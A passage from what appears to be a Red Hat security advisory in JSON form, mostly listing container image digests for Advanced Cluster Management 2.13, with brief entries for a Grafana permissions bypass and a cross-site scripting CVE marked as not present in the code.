"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "grafana/grafana/pkg/services/dashboards: Grafana Dashboard Permissions Scope Bypass Enables Cross\u2011Dashboard Privilege Escalation"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
